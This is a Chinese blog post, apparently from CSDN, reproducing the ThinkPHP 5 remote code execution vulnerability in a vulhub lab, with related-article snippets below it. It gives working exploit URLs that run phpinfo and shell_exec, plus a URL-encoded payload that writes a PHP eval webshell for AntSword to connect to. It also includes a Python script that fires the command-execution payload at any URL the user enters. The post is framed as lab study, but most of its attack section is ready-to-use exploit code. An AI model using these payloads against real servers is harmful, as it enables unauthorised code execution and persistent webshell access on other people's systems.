thinkphp5 5.0.22/5.1.29远程代码执行漏洞

已于 2024-04-27 13:39:10 修改
阅读量836 收藏 9
点赞数 13
分类专栏: python武器库 web安全 文章标签: web安全
于 2024-04-27 09:50:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/138241403
版权

1漏洞描述

ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞。

2 影响范围

受影响的版本包括 5.0.23 和 5.1.31 之前的所有版本

3漏洞环境搭建

cd vulhub/thinkphp/5.rce
环境部署命令
docker compose up -d
查看端口
docker-compose ps

容器搭建成功之后,能够在浏览器中正确访问页面

4 使用payload进行复现

直接访问,它将执行 phpinfo

http://192.168.135.132:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

任意代码执行

http://192.168.135.132:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id

写入webshell

http://192.168.135.132:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C%3Fphp%20%40eval(%24_POST%5B'cmd'%5D)%3B%3F%3E

访问shell.php

使用蚁剑连接webshell


5使用python脚本探测漏洞是否存在

此代码用于实验,

#!/usr/bin/env python
​
import requests
from urllib.parse import urljoin
​
def thinkphp5x_rce(url):
    poc = r'index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id'
​
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
​
    payload = urljoin(url,poc)
​
    response = requests.post(url=payload, verify=False, headers=headers)
​
    if 'www-data' in response.text:
        print("漏洞存在")
    else:
        print("漏洞不存在")
​
if __name__ == '__main__':
    print("注意:本代码仅用于实验和学习目的,请谨慎使用。")
    url = input("请输入目标 URL: ")
    thinkphp5x_rce(url)

结果

乐队1
关注
  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 594
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkPHP5.0.22
12-06
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
七天
07-14 1301
文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码 一、漏洞简介 ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
Gjqhs的博客
03-09 2964
ThinkPHP5 5.0.23 远程代码执行漏洞_Gjqhs的博客-CSDN博客 没太大区别,不过是由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。 访问http://your-ip:8080,您将看到 ThinkPHP 的默认页面。 POC 直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_f.
【环境学习】ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
weixin_30646505的博客
04-04 334
环境保留:2019.4.4-4.10 环境搭建: 这里我使用的是:vulhub vulhub目录结构:vulhub/thinkphp/5-rcess 测试地址(开放一段时间供大家学习):http://bugbank.51vip.biz:29021 成因分析: ...
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
热门推荐
a1b2c3是弱口令
12-11 1万+
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 复现环境 ThinkPHP 5.0.20版本 环境启动后,访问http://192.168.1.15:8080即可看到ThinkPHP默认启动页面。 漏洞复现 payload: /index.php?s=inde...
Thinkphp5-5.0.22/5.1.29远程执行代码漏洞
hovcfuti的博客
10-13 296
ThinkPHP版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。升级方法请参考:https://blog.thinkphp.cn/869075。vulhub拉取靶场。写入webshell。
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现
qq_38807738的博客
02-09 3636
复现环境 thinkphp5.0.22 推荐使用vulhub快速搭建漏洞环境 漏洞payload: 1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100 2:index.php?s=index/think\app/invokefunction&function=cal...
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2762
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
ThinkPHP5 5.0.22/5.1.29 RCE】
xhwfa的博客
05-02 3138
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1910
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
qq_53409748的博客
03-16 221
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
thinkphp 远程代码执行原理
最新发布
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞的原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法名来调用Request类的任意方法,并构造利用链来执行远程代码。这种漏洞可以被攻击者利用来执行恶意代码,从而导致系统被入侵或数据泄露的风险。 为了防止这种漏洞,开发者应该对控制器名和方法名进行严格的检测和过滤,确保只允许合法的请求被执行。此外,及时更新框架版本也是非常重要的,因为官方通常会发布安全更新来修复这类漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值